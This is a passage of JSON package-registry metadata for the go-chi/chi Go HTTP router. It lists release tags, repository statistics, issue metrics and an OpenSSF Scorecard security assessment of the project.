sitories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.267Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":7.8620489257759285,"dependent_packages_count":6.970633637833028,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":7.416341281804478},"purl":"pkg:golang/github.com/%21g%21o-%21c%21h%21i/chi","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/GO-CHI/chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/GO-CHI/chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/GO-CHI/chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGO-CHI%2Fchi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGO-CHI%2Fchi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGO-CHI%2Fchi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGO-CHI%2Fchi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGO-CHI%2Fchi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGO-CHI%2Fchi/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":10091471,"name":"github.com/Go-chi/chi/v5","ecosystem":"go","description":"Package chi is a small, idiomatic and composable router for building HTTP services.\n\nchi supports the four most recent major versions of Go.\n\nExample:\n\nSee github.com/go-chi/chi/_examples/ for more in-depth examples.\n\nURL patterns allow for easy matching of path components in HTTP\nrequests. The matching components can then be accessed using\nchi.URLParam(). All patterns must begin with a slash.\n\nA simple named placeholder {name} matches any sequence of characters\nup to the next / or the end of the URL. Trailing slashes on paths must\nbe handled explicitly.\n\nA placeholder with a name followed by a colon allows a regular\nexpression match, for example {number:\\\\d+}. The regular expression\nsyntax is Go's normal regexp RE2 syntax, except that / will never be\nmatched. An anonymous regexp pattern is allowed, using an empty string\nbefore the colon in the placeholder, such as {:\\\\d+}\n\nThe special placeholder of asterisk matches the rest of the requested\nURL. Any trailing characters in the pattern are ignored. This is the only\nplaceholder which will match / characters.\n\nExamples:","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/Go-chi/chi","keywords_array":[],"namespace":"github.com/Go-chi/chi","versions_count":24,"first_release_published_at":"2021-02-28T00:11:55.000Z","latest_release_published_at":"2026-07-05T18:51:45.000Z","latest_release_number":"v5.3.1","last_synced_at":"2026-08-12T02:06:21.941Z","created_at":"2024-05-24T06:59:09.696Z","updated_at":"2026-08-12T02:06:21.941Z","registry_url":"https://pkg.go.dev/github.com/Go-chi/chi/v5","install_command":"go get github.com/Go-chi/chi/v5","documentation_url":"https://pkg.go.dev/github.com/Go-chi/chi/v5#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the 